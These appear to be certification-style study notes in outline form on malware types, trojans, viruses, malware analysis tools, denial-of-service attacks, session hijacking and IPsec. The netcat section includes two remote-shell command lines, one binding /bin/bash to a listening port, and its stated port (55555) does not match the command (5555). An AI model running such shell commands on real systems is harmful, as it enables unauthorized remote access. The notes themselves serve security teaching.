- Malware and Other Attacks
- Software designed to harm or secretly access a computer system without informed consent
- Most is downloaded from the Internet with or without the user's knowledge
- Overt Channels: legitimate communication channels used by programs
- Covert Channels: used to transport data in unintended ways
- Wrappers: programs that allow you to bind an executable to an innocent file
- Example: IExpress Wizard
- Crypters
- Using a combination of encryption and code manipulation to render malware undetectable to security programs
- Example: BitCrypter
- Packers
- Compressing the executable into a smaller size, and obscure the actual program, which helps evade signature based detection
- Entry point of an executable may refer to a named section of code where the label is the name of a packer
- Droppers: installing other malware files on to system either from malware package or Internet
- Downloader: downloading other malware from Internet on to PC
- Injector: injecting its code into other vulnerable running process and changes the way of execution in order to hide or prevent removal
- Obfuscator: concealing its code, makes it hard for security mechanisms detect or remove it
- Exploit Kit: helping to deliver exploits and payloads, like Crimepack
- Software that appears to perform a desirable function but instead performs malicious activity
- To hackers, it is a method to gain and maintain access to a system
- Trojans are means of delivery whereas a backdoor provides the open access
- Remote Access Trojan (RAT): providing attackers with full control over the victim's system, enabling them to remotely access files, private conversations, accounting data, and others
- PoisonIvy
- MoSucker
- Blackhole
- Backdoor Trojan: RAT has UI, the client component, whereas a backdoor does not
- Botnet Trojan: infecting numerous of computers across a large geographical area to create a network of bots that is controlled through a Command and Control (C&C) center
- Necurs
- Mirai
- E-banking Trojans: intercepting victim's account informed before the system can encrypt it, and send it to the attacker's C&C center
- Zeus
- Proxy Server Trojan: usually a standalone application that allows remote attackers to use the victim's computer as a proxy to connect to the Internet
- Covert Channel Tunneling Trojan (CCTT): a RAT, creating arbitrary data transfer channels in previously authorized data streams
- Defacement Trojan: once spreading over the system, can destroy or change the entire content present in a database
- Command Shell Trojan: providing a backdoor to connect to through command-line access
- Netcat
- "Swiss army knife" of tcp/ip hacking
- Providing all sorts of control over a remote shell on a target
- Can connect over TCP or UDP, from any port
- Offering DNS forwarding, port mapping and forwarding and proxying
- Connect:
nc -e IPaddress Port# - Open a listening port on 55555 from target machine:
nc -l -p 5555 -e /bin/bash
- CryptCat: encrypted version of netcat
- Netcat
| Trojan Name | Port |
|---|---|
| Death | 2 |
| Senna Spy | 20 |
| Hackers Paradise | 31,456 |
| TCP Wrappers | 421 |
| Doom, Santaz Back | 666 |
| Silencer, WebEx | 1001 |
| RAT | 1095-98 |
| SubSeven | 1243 |
| Shiva-Burka | 1600 |
| Trojan Cow | 2001 |
| Deep Throat | 6670-71 |
| NetBus | 12345-6 |
| Whack a Mole | 12361-3 |
| Back Orifice | 31337,8 |
- Process Explorer (PE): Microsoft tool that shows you everything about running processes
- Registry Monitoring Tools
- SysAnalyzer
- Active Registry Monitor
- Regshot
- Tripwire: integrity verifier that can act as a HIDS in protection against Trojans
- SIGVERIF: building into Windows to verify the integrity of the system
- Log file can be found at c:\windows\system32\sigverif.txt
- Looking for drivers that are not signed
- Self-replicating program that reproduces by attaching copies of itself into other executable code
- Usually installed by user clicking on malicious file attachments or downloads
- Virus Hoax: a kind of bluff and false alarm claiming reports about nonexistent viruses to cause fear
- Fake Antivirus: trying to convince a user has a virus and have them download an AV that is a virus itself
- Ransomware: malicious software designed to deny access to a computer until a price is paid; usually spread through email
- Locky: Using RSA-2048 and AES-128 to lock files
- WannaCry: famous ransomware, within 24 hours had 230,000 victims, exploited unpatched SMB vulnerability
- Petya-NotPetya: spreading over network using WMIC (Windows Management Instrumentation Command-line) by capturing all credentials from local machine using Mimikatz
- Boot Sector Virus: known as system virus, moving boot sector to another location and then inserts its code in the original location
- Shell Virus: wrapping around an application's code, inserting itself before the application's
- Cluster Virus: modifying directory table entries so every time a file or folder is opened, the virus runs
- Multipartite Virus
- Attempting to infect both boot sector and files
- Generally referring to viruses with multiple infection methods, or executing different in different places on target at the same time
- Macro Virus: written in VBA, infects template files, mostly MS Word and MS Excel
- Polymorphic Code Virus: mutating its code by using a polymorphic engine; difficult to find because code is always changing
- Encryption Virus: using encryption to hide the code from antivirus
- Metamorphic Virus: rewriting itself every time it infects a new file
- Win32/ Simile
- Zmist: Mistfall is the first virus uses technique called code integration. This code inserts itself into other code and regenerates code and rebuilds the executable
- Stealth Virus: known as tunneling virus, attempts to evade AVs by actively altering and corrupting the service call interrupts while running
- Cavity Virus: overwriting portions of host files as to not increase the actual size of the file; uses null content sections
- Armored Virus: containing a variety of mechanisms specifically coded to make its detection and decryption very difficult
- Companion/Camouflage Virus: spoofing a scanner by camouflaging itself to the identical file name as targeted program file
- Cluster Virus: modifying directory table entries so that it points users or system processes to the virus code instead of the actual program
- Sparse Infector Virus
- Only infecting occasionally, like every tenth program executed
- Deciding which file to infect based on certain conditions, like target file with max. size of 128kb
- File Extension Virus: changing the file extensions of files to take advantage of most people having them turned off (readme.txt.vbs shows as readme.txt)
- Logic Bomb Virus: triggered by a response to an event, such as launching an application or when a specific date/time is reached
- Self-replicating malware that sends itself to other computers without human intervention
- Usually doesn't infect files, just resides in active memory
- Often used in botnets
- Sheep Dip: referring to analysis of suspect files
- Sheep Dip Computer: installed with port monitors, file monitors, network monitors and antivirus software, connects to a network only under strictly controlled conditions
- Dismantling of a given executable into binary format to study its functionalities and features
- Tools
- HashMyFiles: file fingerprinting
- VirusTotal: online malware scanning
- PEiD: identifying packing/obfuscation methods
- Dependency Walker: listing all dependent modules of an executable file
- IDA Pro: disassembler and debugger
- Running malware and identifying changes to the system, usually in a sandbox environment
- Make sure you have a good test bed
- Use a VM with NIC in host-only mode and no open shares
- Analyze the malware on the isolated VM in a static state
- Tools - binText and UPX help with looking at binary
- Run the malware and check out processes
- Use Process Monitor, etc. to look at processes
- Use NetResident, TCPview or even Wireshark to look at network activity
- Check and see what files were added, changed, or deleted
- Make sure you have a good test bed
- Detecting new or unknown viruses that are usually variants of an already existing virus family
- Drawback: too many false positives
- Can be static or dynamic
- Static Heuristic Analysis: The anti-virus analyzes the file format and code structure to determine if the code is viral
- Dynamic Heuristic Analysis: The anti-virus performs a code emulation of the suspicious code to determine if the code is viral
- IDA Pro
- Anubis
- Threat Analyzer
- Make sure you know what is going on in your system
- Have a good antivirus that is up to date
- DEP (Data Execution Prevention): prevents from accidentally executing a potentially malicious batch or PowerShell script in Windows
- DLP (Data Loss Prevention): a strategy for preventing end users from sending sensitive or critical information outside of the corporate network
- Seeking to take down a system or deny access to it by authorized users
- Botnet: network of zombie computers a hacker uses to start a distributed attack
- Can be controlled over HTTP, HTTPS, IRC, or ICQ
- Fragmentation Attack: taking advantage of the system's ability to reconstruct fragmented packets
- Volumetric Attack: bandwidth attack, consuming all bandwidth for the system or service
- Application Attack
- Consuming the resources necessary for the application to run
- Application level attack is against weak code
- Application attack is just the general term
- TCP state-exhaustion Attack: going after load balancers, firewalls and application servers by attacking connection state tables
- SYN Flood: sending thousands of SYN packets with fake source IP address and not responding to the SYN/ACK packets; lots of half connections where the 3-way hanndshake is never completed; eventually target runs out of resources
- ICMP flood: sending ICMP ECHO packets with a spoofed address; eventually reaches limit of packets per second sent
- Smurf: sending large number of pings to the broadcast address of the subnet with source IP spoofed as the target, entire subnet responds exhausting the target; using ICMP ECHO requests
- Fraggle: same as Smurf but with UDP packets
- Ping of Death: fragmenting ICMP messages, after reassembled, ICMP packet is larger than the maximum size and crashes the system
- Teardrop: overlapping numerous garbled TCP/IP fragments with oversized payloads, causes older systems to crash due to fragment reassembly
- Phlashing: also known as bricking a system, causing permanent damage to a system
- LAND Attack (Local Area Network Denial): sending a TCP SYN packet to the target with a spoofed IP the same as the target; if vulnerable, target loops endlessly and crashes
- DDoS (Distributied Denial of Service): incoming traffic flooding the victim originates from many different sources
- DRDoS (Distributied Reflexion Denial of Service): using IP spoofing, the source address is set to targeted victim, which means all the replies will go to the target and flood the target
- Slowloris: trying to keep many connections to the target web server open and hold them open as long as possible
- Low Orbit Ion Cannon (LOIC): DDoS tool that floods a target with TCP, UDP or HTTP requests
- Trinity: Linux based DDoS tool
- Attacker waits for a session to begin and after the victim authenticates, steals the session for himself
- Predicting can be done by knowing the window size and the packet sequence number
- Also can be done via brute force, calculation or stealing
- Sniff the traffic between the client and server
- Monitor the traffic and predict the sequence numbering
- Desynchronize the session with the client
- Predict the session token and take over the session
- Inject packets to the target server
- Using unpredictable session IDs
- Limiting incoming connections
- Minimizing remote access
- Regenerating the session key after authentication
- Using IPsec to encrypt
- Transport Mode
- Payload and ESP trailer are encrypted, not IP header
- Can be used in NAT because the original packet is still routed in exactly the same manner as it would have been without IPsec
- Tunnel mode
- Everything is encrypted
- Cannot be used with NAT
- Architecture Protocols
- Authentication Header: guarantying the integrity and authentication of IP packet sender
- Encapsulating Security Payload (ESP): providing origin authenticity and integrity as well as confidentiality
- Internet Key Exchange (IKE): producing the keys for the encryption/decryption process, port 500
- Oakley: using Diffie-Hellman to create master and session keys
- Internet Security Association Key Management Protocol (ISAKMP): software that facilitates encrypted communication between two endpoints
- Ettercap: man-in-the-middle tool and packet sniffer on steroids
- Zaproxy
- Paros proxy
- Burp Suite
- Hamster
- IKE-scan: IPsec VPN scanning and fingerprinting tool